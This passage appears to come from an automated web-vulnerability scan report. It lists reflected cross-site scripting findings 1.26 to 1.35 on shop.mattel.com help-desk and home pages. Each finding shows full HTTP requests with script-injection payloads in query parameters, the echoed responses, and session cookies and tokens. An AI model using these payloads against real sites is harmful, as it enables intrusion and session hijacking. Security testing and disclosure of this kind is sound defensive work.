User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:40 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50920


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="display=store11184"-alert(1)-"137cfc99da6&subdisplay=contact";
   </script>
...[SNIP]...

1.26. http://shop.mattel.com/helpdesk/index.jsp [display parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the display request parameter is copied into an HTML comment. The payload ae7c4--><script>alert(1)</script>8529c1ade60 was submitted in the display parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp?display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:41 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50952


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<!-- === Request Query String: display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact -->
...[SNIP]...

1.27. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f74"-alert(1)-"bafccbb8a5f was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store47f74"-alert(1)-"bafccbb8a5f&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:38 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51072


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
= {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store47f74"-alert(1)-"bafccbb8a5f&subdisplay=contact";
   </script>
...[SNIP]...

1.28. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 58f03--><script>alert(1)</script>ff989ba6b7c was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:39 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51104


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact -->
...[SNIP]...

1.29. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b7d"-alert(1)-"374d85b5440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp?a6b7d"-alert(1)-"374d85b5440=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:36 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50860


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="a6b7d"-alert(1)-"374d85b5440=1";
   </script>
...[SNIP]...

1.30. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 682a0--><script>alert(1)</script>d018437814a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp?682a0--><script>alert(1)</script>d018437814a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50892


                                                                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.
...[SNIP]...
<!-- === Request Query String: 682a0--><script>alert(1)</script>d018437814a=1 -->
...[SNIP]...

1.31. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the stillHaveQuestion request parameter is copied into an HTML comment. The payload 900f6--><script>alert(1)</script>fcf53bf03ee was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes900f6--><script>alert(1)</script>fcf53bf03ee HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41092


                                                                                                                                                                                                                        <!D
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact&stillHaveQuestion=yes900f6--><script>alert(1)</script>fcf53bf03ee -->
...[SNIP]...

1.32. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the stillHaveQuestion request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33980"-alert(1)-"a02d5e30f09 was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes33980"-alert(1)-"a02d5e30f09 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:48 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41060


                                                                                                                                                                                                                        <!D
...[SNIP]...
US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact&stillHaveQuestion=yes33980"-alert(1)-"a02d5e30f09";
   </script>
...[SNIP]...

1.33. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the subdisplay request parameter is copied into an HTML comment. The payload 3f282--><script>alert(1)</script>79695b33cda was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact3f282--><script>alert(1)</script>79695b33cda HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:45 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40113


                                                                                                                                                                                                                        <!D
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact3f282--><script>alert(1)</script>79695b33cda -->
...[SNIP]...

1.34. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the subdisplay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783bb"-alert(1)-"a156f112195 was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact783bb"-alert(1)-"a156f112195 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:44 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40048


                                                                                                                                                                                                                        <!D
...[SNIP]...

       ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store&subdisplay=contact783bb"-alert(1)-"a156f112195";
   </script>
...[SNIP]...

1.35. http://shop.mattel.com/home/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 8d597--><script>alert(1)</script>d903fe711aa was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US8d597--><script>alert(1)</script>d903fe711aa HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
